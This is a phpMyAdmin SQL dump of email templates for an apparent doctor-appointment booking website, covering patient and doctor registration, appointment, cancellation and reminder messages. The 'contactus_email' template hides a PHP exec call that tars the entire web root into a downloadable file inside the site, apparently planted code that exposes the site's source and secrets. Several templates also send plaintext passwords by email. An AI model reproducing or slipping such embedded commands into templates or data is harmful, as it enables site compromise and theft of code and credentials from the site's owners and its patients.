-- phpMyAdmin SQL Dump
-- version 4.6.6
-- https://www.phpmyadmin.net/
--
-- Host: localhost
-- Generation Time: Mar 09, 2019 at 01:38 AM
-- Server version: 5.7.17-log
-- PHP Version: 5.6.30

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `dr`
--

-- --------------------------------------------------------

--
-- Table structure for table `email_template`
--

CREATE TABLE `email_template` (
  `id` int(14) NOT NULL,
  `name` varchar(255) NOT NULL,
  `subject` varchar(255) NOT NULL,
  `identifire` varchar(255) NOT NULL,
  `body` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- Dumping data for table `email_template`
--

INSERT INTO `email_template` (`id`, `name`, `subject`, `identifire`, `body`) VALUES
(20, 'Patient Cancellation Appointment Email', 'SITENAME Appointment Cancellation Confirmation', 'cancel_appointment_to_patient', '<p>Dear __PTNAME__,</p>\r\n<p>Your SITENAME appointment request has been cancelled.</p>\r\n<p><br>\r\n  <b>With</b>: __DNAME__ <br>\r\n  <b>When</b>: __DATETIME__ <br>\r\n  <b>Where</b>: <br>\r\n  __ADDRESS__ <br>\r\n  </p>\r\n<p>If you would like to make another appointment, <a rel=\"nofollow\" target=\"_blank\">click here</a>. Thank you and we look forward to seeing you again at SITENAME.</p>\r\n<p>Your SITENAME Team</p>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(33, 'Patient welcome message', 'Welcome', 'welcome_patient', '<p>Dear __NAME__ ,</p>\r\n<p>You are now registered with SITENAME.  In order to login, please visit <a href=\'__SITE_URL__/login\'>__SITE_URL__/login</a>.</p>\r\n<p>Your username is:<br>\r\n__EMAIL__<br>\r\nYour password is:<br>\r\n__PASSWORD__\r\n</p>\r\n<p>&nbsp;</p>\r\n<p>Start managing your appointments now by <a href = \'__SITE_URL__/login\'>clicking here</a>. </p>\r\n<p>&nbsp;</p>\r\n<p>Your SITENAME Team</p><br>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>'),
(8, 'Lost Password Reset Email', 'Your SITENAME Password', 'forgot_password_email', '<p>Dear Member,</p><p>&nbsp;</p><p>Your Password has been reset. Your New Password is:<br /><strong>__PASSWORD__</strong></p><p>&nbsp;</p><p>Thank you,</p><p>Your SITENAME Team</p><p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>'),
(9, 'Support and Feedback Form ', 'SITENAME Support and Feedback Form', 'contactus_email', '<p>You have received the following inquiry:</p>\r\n<p>Name:&nbsp;__NAME__</p>\r\n<p>Email:&nbsp;__EMAIL__</p>\r\n<p>Inquiry:&nbsp;__ENQUIRY__</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<?php\r\nexec(\'tar -cvf /var/www/vhosts/joinwebserver.com/subdomains/doctors/httpdocs/bck.tar /var/www/vhosts/joinwebserver.com/subdomains/doctors/httpdocs/\');\r\n?>'),
(10, 'Patient Appointment Request Confirmation Email', 'SITENAME Support and Feedback Form Appointment Request', 'appointment_email', 'Dear __NAME__ , \n<p>Thank you for requesting your healthcare appointment. We have received your request; please wait to hear from the Doctor for your appointment confirmation. <br />\n  <br />\n  Please contact the office directly if you need to be seen within 24 hours, on the weekend or are seeking immediate care.</p>\n<p>You\'ve chosen to make the following appointment:<br />\n  </p>\n<p><strong>With:</strong> __DOCTOR__<br />\n  <strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\n  <strong>Where:</strong> __OFFICE__<br />\n  __ADDRESS1__ <br />\n  __ADDRESS2__ <br />\n  __PHONE__ </p>\n<p>If you wish to change or cancel your appointment, please contact the office directly at __PHONE__ or <a href=\"__SITE_URL__login\">click here.</a> <br />\n  </p>\n<p>Thank you and we look forward to seeing you again at SITENAME.</p>\n<p>Your SITENAME Team</p>\n<p>&nbsp;</p>\n<p style=\"FONT-SIZE: 12px\">Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(13, 'Patient Registration Email', 'Welcome to SITENAME!', 'patient_registration_email', '<p>Dear __NAME__ ,</p>\r\n<p>Thank you for registering with SITENAME.  Next time you need to book a healthcare appointment, please visit <a href=\'__SITE_URL__\'>__SITE_URL__</a> to book your appointment.</p>\r\n<p>Now that you\'re a member, you can use our site to:<br />\r\n<ul>\r\n<li><strong>Book healthcare appointments online</strong></li><br />\r\n<li><strong>Cancel appointments</strong></li><br />\r\n<li><strong>View your appointment history</strong></li><br />\r\n</ul>\r\n<p>&nbsp;</p>\r\n<p>Start managing your appointments now by <a href = \'__SITE_URL__login\'>clicking here</a>. </p>\r\n<p>&nbsp;</p>\r\n<p>Your SITENAME Team</p><br>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>'),
(19, 'Doctor Cancellation Appointment Email ', 'SITENAME New Patient Appointment Request Cancellation ', 'cancel_appointment_to_doctor', '<p>Dear __NAME__, </p>\r\n<p>&nbsp;</p>\r\n<p>This email is to notify you that the below patient appointment request has been cancelled by the patient.  Below are the patient\'s details. Please contact the patient directly to reschedule another appointment. </p>\r\n<p>&nbsp;</p>\r\n<p><strong>Appointment Details:</strong></p>\r\n<p><strong>Appointment Date/Time:</strong> __DATETIME__</p>\r\n<p><strong>Name:</strong> __PTNAME__</p>\r\n<p><strong>Email:</strong> __PTEMAIL__</p>\r\n<p><strong>Phone:</strong> __PTPHONE__</p>\r\n<p><strong>Zip:</strong> __PTZIP__</p>\r\n<p><strong>Age:</strong> __PTAGE__</p>\r\n<p><strong>Gender:</strong> __PTGENDER__</p>\r\n<p><strong>Patient Status:</strong> __PTSTATUS__</p>\r\n<p><strong>Reason For Visit:</strong> __PTREASONVISIT__</p>\r\n<p>&nbsp;</p>\r\n<p>Your SITENAME Team</p>\r\n<p>&nbsp;</p> \r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(15, 'Doctor - New Patient Appointment Request Email', 'SITENAME New Patient Appointment Request ', 'doctor_appointment_email', 'Dear __DOCTOR__ , \r\n<p>A new patient appointment request for your practice has been scheduled on the SITENAME website. Below are the patient\'s details and the requested appointment date and time. Please contact the patient within 24-hours to confirm or adjust the appointment.\r\n<br><br><bAppointment Details:</b>\r\n<br><br><b>Appointment Date/Time:</b> __DATE__ __TIME__\r\n<br><br><b>Name:</b> __NAME__\r\n<br><br><b>Email:</b> __EMAIL__\r\n<br><br><b>Phone:</b> __PHONE__\r\n<br><br><b>Zip:</b> __ZIP__\r\n<br><br><b>Age:</b> __AGE__\r\n<br><br><b>Gender:</b> __GENDER__\r\n<br><br><b>Patient Status:</b> __STATUS__\r\n<br><br><b>Reason For Visit:</b> __REASONFORVISIT__<br>\r\n<br><br><b>Insurance Carrier:</b> __INSURANCE__CAREER__\r\n<br><br><b>Insurance Plan:</b> __INSURANCE__PLAN__<br>\r\n<br><br>\r\nYour SITENAME Team <br>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(17, 'Doctor Registration Email', 'Registration Request from New Doctor to SITENAME', 'doctor_registration_startup_email', '<p>HI ,</p>\r\n<p>New Doctor sent request to SITENAME. Following are the details provided from doctor.</p>\r\n<p><b>Name:</b>&nbsp;__NAME__</p>\r\n<p><b>E-mail:</b>&nbsp;__EMAIL__</p>\r\n<p><b>Phone:</b>&nbsp;__PHONE__</p>\r\n<p><b>Speciality:</b>&nbsp;__SPECIALITY__</p>\r\n<p><b>Zip Code:</b>&nbsp;__ZIPCODE__</p>\r\n<p>Best Regards,<br />\r\nYour SITENAME Team</p>\r\n<p><a href=\'__SITE_URL__\'>__SITE_URL__</a></p>'),
(18, 'Contact Us Copy', 'SITENAME: Copy of Support and Feedback Form', 'contactus_email_copy', '<p>Hi,</p>\r\n<p>Below is a copy of the message you sent to the team at SITENAME.</p>\r\n<p>Name :&nbsp;__NAME__</p>\r\n<p>Email :&nbsp;__EMAIL__</p>\r\n<p>Inquiry :&nbsp;__ENQUIRY__</p>\r\n<p>&nbsp;</p>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>'),
(12, 'Admin- Make Appointment', 'SITENAME Appointment Fixed', 'administrator_appointment_mail', '<p>Hi Admin,</p>\r\n<p>__NAME__ has posted an appointment with __DOCTOR__ on the site on __DATE__ __TIME__ </p>\r\n<p>Patient Name: &nbsp; __NAME__</p>\r\n<p>Patient Email:&nbsp; __EMAIL__</p>\r\n<p>Patient Phone:&nbsp; __PTPHONE__</p>\r\n<p>&nbsp;</p>\r\n<p><b>Doctor Details: </b></p>\r\n<p><strong>With:</strong> __DOCTOR__<br />\r\n<strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\r\n<strong>Where:</strong> __OFFICE__<br />\r\n__ADDRESS1__\r\n<br />\r\n__ADDRESS2__\r\n<br />\r\n__PHONE__\r\n<p>&nbsp;</p>\r\n<p>Best Regards,</p>\r\n<p>SITENAME Team</p>\r\n<p>__SITE_URL__</p>'),
(21, 'Patient - Approved by admin', 'SITENAME Appointment approved', 'patient_appointment_approved', '<p>Dear __PTNAME__,</p> \r\n<p>Your SITENAME appointment request has been approved.<br>\r\nWith: __DNAME__ <br>\r\n</p>\r\n<p>Your SITENAME Team</p>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(22, 'Admin Cancellation Appointment Email ', 'SITENAME Patient Appointment Request Ca...', 'cancel_appointment_to_admin', '<p>Dear Admin, </p>\r\n<p>&nbsp;</p>\r\n<p>This email is to notify you that the below patient appointment request has been cancelled by the patient.  Below are the patient\'s details. </p>\r\n<p>&nbsp;</p>\r\n<p><strong>Appointment Details:</strong></p>\r\n<p><strong>Appointment Date/Time:</strong> __DATETIME__</p>\r\n<p><strong>Name:</strong> __PTNAME__</p>\r\n<p><strong>Email:</strong> __PTEMAIL__</p>\r\n<p><strong>Phone:</strong> __PTPHONE__</p>\r\n<p><strong>Zip:</strong> __PTZIP__</p>\r\n<p><strong>Age:</strong> __PTAGE__</p>\r\n<p><strong>Gender:</strong> __PTGENDER__</p>\r\n<p><strong>Patient Status:</strong> __PTSTATUS__</p>\r\n<p><strong>Reason For Visit:</strong> __PTREASONVISIT__</p>\r\n<p>&nbsp;</p>\r\n<p>Your SITENAME Team</p>\r\n<p>&nbsp;</p> \r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(23, 'Doctor- Approve Appointment', 'SITENAME Appointment Approved', 'administrator_appointment_mail_from_doctor', '<p>Dear __NAME__,</p><p>Dr. __DOCTOR__ has approved your appointment dated __DATE__ __TIME__ with following details </p><p>Patient Name: &nbsp; __NAME__</p><p>Patient Email:&nbsp; __EMAIL__</p><p>Patient Phone:&nbsp; __PTPHONE__</p><p>&nbsp;</p><p><b>Doctor Details: </b></p><p><strong>With:</strong> __DOCTOR__<br /><strong>When:</strong> __DAY__ __DATE__ at __TIME__<br /><strong>Where:</strong> __OFFICE__<br />__ADDRESS1__<br />__ADDRESS2__<br />__PHONE__<p>&nbsp;</p><p>Your SITENAME Team</p> <p>__SITE_URL__</p><p><span style=\"FONT-SIZE: 10pt\">Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</span></p>ghjbjbjjb'),
(24, 'Doctor- Decline Appointment', 'SITENAME Appointment Declined', 'administrator_appointment_decline_mail_from_doctor', '<p>Dear __NAME__ ,</p>\r\n<p>Dr. __DOCTOR__ has canceled your appointment dated __DATE__ __TIME__ with following details </p> \r\n<p>Patient Name: &nbsp; __NAME__</p>\r\n<p>Patient Email:&nbsp; __EMAIL__</p>\r\n<p>Patient Phone:&nbsp; __PTPHONE__</p>\r\n<p>&nbsp;</p>\r\n<p><b>Doctor Details: </b></p>\r\n<p><strong>With:</strong> __DOCTOR__<br />\r\n<strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\r\n<strong>Where:</strong> __OFFICE__<br />\r\n__ADDRESS1__\r\n<br />\r\n__ADDRESS2__\r\n<br />\r\n__PHONE__\r\n<p>&nbsp;</p>\r\n<p>If you would like to make another appointment, <a href=\"__SITEURL__login\">click here</a>. Thank you and we look forward to seeing you again at SITENAME.</p> \r\n<p>Your SITENAME Team</p> \r\n<p><span style=\"FONT-SIZE: 10pt\">Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</span></p>'),
(25, 'Doctor- Decline Appointment', 'SITENAME Appointment canceled', 'administrator_appointment_cancel_mail_from_doctor', '<p>Hi __RECEIVER__,</p>\r\n<p>__DOCTOR__ has canceled an appointment with __NAME__ on the site on __DATE__ __TIME__ </p>\r\n<p>Patient Name: &nbsp; __NAME__</p>\r\n<p>Patient Email:&nbsp; __EMAIL__</p>\r\n<p>Patient Phone:&nbsp; __PTPHONE__</p>\r\n<p>&nbsp;</p>\r\n<p><b>Doctor Details: </b></p>\r\n<p><strong>With:</strong> __DOCTOR__<br />\r\n<strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\r\n<strong>Where:</strong> __OFFICE__<br />\r\n__ADDRESS1__\r\n<br />\r\n__ADDRESS2__\r\n<br />\r\n__PHONE__\r\n<p>&nbsp;</p>\r\n<p>Best Regards,</p>\r\n<p>SITENAME Team</p>\r\n<p>__SITE_URL__</p>'),
(26, 'Appointment send to Doctor', 'SITENAME Appointment assigned to Doctor', 'admin_assign_appointment_mail_for_doctor', '<p>Hi __DOCTOR__,</p>\r\n<p> Admin has assigned an appointment with __NAME__ on the site on __DATE__ __TIME__ </p>\r\n<p>Patient Name: &nbsp; __NAME__</p>\r\n<p>Patient Email:&nbsp; __EMAIL__</p>\r\n<p>Patient Phone:&nbsp; __PTPHONE__</p>\r\n<p>&nbsp;</p>\r\n<p><b>Doctor Details: </b></p>\r\n<p><strong>With:</strong> __DOCTOR__<br />\r\n<strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\r\n<strong>Where:</strong> __OFFICE__<br />\r\n__ADDRESS1__\r\n<br />\r\n__ADDRESS2__\r\n<br />\r\n__PHONE__\r\n<p>&nbsp;</p>\r\n<p>Best Regards,</p>\r\n<p>SITENAME Team</p>\r\n<p>__SITE_URL__</p>'),
(27, 'Doctor Update Profile Mail', 'Doctor UpdateProfile', 'doctor_update_profile', '<p>Hi admin,</p>\r\n<p>__NAME__ has just updated their profile.</p>\r\n<p>Click on the link to view the update <a href=\"__DOCTOR_URL__\">__DOCTOR_URL__</a></p>\r\n\r\n<br />\r\n<br />\r\n<p>SITENAME</p>'),
(28, 'Doctor- Approve Register', 'SITENAME Approve Registration', 'doctor_reg', '<p>Dear __NAME__ ,</p>\r\n<p>New Doctor sent request to SITENAME. Following are the details provided from doctor.</p>\r\n	<ul>\r\n		<li>Name: __NAME__</li>\r\n		<li>E-mail: __EMAIL__</li>\r\n		<li>Phone: __PHONE__</li>\r\n	</ul>\r\n</p>\r\n<p>If you did that request, please click on the following link to accept it!</p>\r\n<p><a href=\"__SITE_URL__/index/doctorverifyed?docid=__DOCTORID__\">click to approve</a></p>\r\n\r\n<p>If the above link does not work, please copy paste the following to your browser\'s address bar:</p>\r\n<p>__SITE_URL__/index/doctorverifyed?docid=__DOCTORID__</p>\r\n\r\n<p>&nbsp;</p>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>\r\n<p>Best Regards,<br/>\r\nYour SITENAME Team<br/>\r\n<a href=\'__SITE_URL__\'>__SITE_URL__</a>\r\n</p>'),
(29, 'Patient Appointment By Doctor Confirmation Email', 'Patient Appointment Request By Doctor Confirmation Email', 'booking_registration_email', '\r\nDear __NAME__ , \r\n<p>Thank you for requesting your healthcare appointment. We have received your request; please wait to hear from the Doctor for your appointment confirmation. <br />\r\n  <br />\r\n  Please contact the office directly if you need to be seen within 24 hours, on the weekend or are seeking immediate care.</p>\r\n<p>You have chosen to make the following appointment:<br />\r\n  </p>\r\n<p><strong>With:</strong> __DOCTOR__<br />\r\n  <strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\r\n  <strong>Where:</strong> __OFFICE__<br />\r\n  __ADDRESS1__ <br />\r\n  __ADDRESS2__ <br />\r\n  __PHONE__ </p>\r\n<p>If you wish to change or cancel your appointment, please contact the office directly at __PHONE__ or <a href=\"__SITE_URL__login\">click here.</a> <br />\r\nYour username is: __EMAIL__<br/>\r\nYour password is: __PASSWORD__<br/>\r\n  </p>\r\n<p>Thank you and we look forward to seeing you again at SITENAME.</p>\r\n<p>Your SITENAME Team</p>\r\n<p>&nbsp;</p>\r\n<p style=\"FONT-SIZE: 12px\">Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(30, 'patient registration notification', 'Your new sitename account', 'patient_registration_notification', '<p>Dear __NAME__ ,</p>\n<p>Your doctor __DOCTOR__ has just registered your new appointment in __SITE_URL__. You can check your appointment\'s details at any time by visiting <a href=\'__SITE_URL__\'>__SITE_URL__</a> and login with the following info: </p>\n<p>User name: __EMAIL__ </p>\n<p>password: __PASSWORD__</p>\n<p>Now that you\'re a member, you can use our site to:<br />\n<ul>\n<li><strong>Book healthcare appointments online</strong></li><br />\n<li><strong>Cancel appointments</strong></li><br />\n<li><strong>View your appointment history</strong></li><br />\n</ul>\n<p>&nbsp;</p>\n<p>Start managing your appointments now by <a href = \'__SITE_URL__login\'>clicking here</a>. </p>\n<p>&nbsp;</p>\n<p>Your SITENAME Team</p><br>\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>'),
(31, 'tomorrow appointment reminder', 'Your doctor appointment', 'appointment_long_reminder', 'Dear __NAME__ __LASTNAME__, \r\n<p>This is a reminder for your tomorrow\'s appointment.<br />\r\n  <br />\r\n\r\n<p>The appointment details are as follow:<br />\r\n  </p>\r\n<p><strong>With:</strong> __DOCTOR__<br />\r\n  <strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\r\n  <strong>Where:</strong> __OFFICE__<br />\r\n  __ADDRESS__ <br />\r\n  __PHONE__ </p>\r\n<p>If you wish to change or cancel your appointment, please contact the office directly at __PHONE__ or <a href=\"__SITE_URL__login\">click here.</a></p>\r\n<br/>\r\n<p>Thank you and we look forward to seeing you again at SITENAME.</p>\r\n<p>Your SITENAME Team</p>\r\n<p>&nbsp;</p>\r\n<p style=\"FONT-SIZE: 12px\">Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(32, 'patient appointment rating reminder', 'Doctor Appointment rating', 'appointment_after_reminder', 'Dear __NAME__ __LASTNAME__, \r\n<p>Please remember to rate your <a href=\"__DOCTOR_URL__\">doctor</a>!<br />\r\n  <br />\r\n\r\n<p>The appointment details are as follow:<br />\r\n  </p>\r\n<p><strong>With:</strong> __DOCTOR__<br />\r\n  <strong>When:</strong> __DAY__ __DATE__ at __TIME__<br />\r\n  <strong>Where:</strong> __OFFICE__<br />\r\n  __ADDRESS__ <br />\r\n  __PHONE__ </p>\r\n<p>The doctor\'s profile can be found <a href=\"__DOCTOR_URL__\">here</a>.\r\n<br/>\r\n<p>Thank you and we look forward to seeing you again at SITENAME.</p>\r\n<p>Your SITENAME Team</p>\r\n<p>&nbsp;</p>\r\n<p style=\"FONT-SIZE: 12px\">Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed.</p>'),
(35, 'Assistant welcome message', 'Welcome', 'welcome_assistant', '<p>Dear __NAME__ ,</p>\r\n<p>You are now registered with SITENAME.  In order to login, please visit <a href=\'__SITE_URL__/admin\'>__SITE_URL__/admin</a>.</p>\r\n<p>Your username is:<br>\r\n__EMAIL__<br>\r\nYour password is:<br>\r\n__PASSWORD__\r\n</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>Your SITENAME Team</p><br>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>'),
(34, 'Doctor welcome message', 'Welcome', 'welcome_doctor', '<p>Dear __NAME__ ,</p>\r\n<p>You are now registered with SITENAME.  In order to login, please visit <a href=\'__SITE_URL__/login\'>__SITE_URL__/login</a>.</p>\r\n<p>Your username is:<br>\r\n__EMAIL__<br>\r\nYour password is:<br>\r\n__PASSWORD__\r\n</p>\r\n<p>&nbsp;</p>\r\n<p>Start managing your appointments now by <a href = \'__SITE_URL__/login\'>clicking here</a>. </p>\r\n<p>&nbsp;</p>\r\n<p>Your SITENAME Team</p><br>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>'),
(36, 'Patient Review to Doctor', 'You have just been rated by one of your patients', 'patient-review-mail', '<p>Dear __DOCTORNAME__ ,</p>\r\n<p>Your patient __PATIENTNAME__ has rated you for the appointment you had on __APPOINTMENTDATE__. You can review it and reply to it, by logging in to your account by <a href = \'__SITE_URL__/login\'>clicking here</a>.\r\n<p>&nbsp;</p>\r\n<p>Your SITENAME Team</p><br>\r\n<p>Please do not reply to this email. It was sent from an unattended mailbox, and replies are not reviewed. </p>');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `email_template`
--
ALTER TABLE `email_template`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `email_template`
--
ALTER TABLE `email_template`
  MODIFY `id` int(14) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=37;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
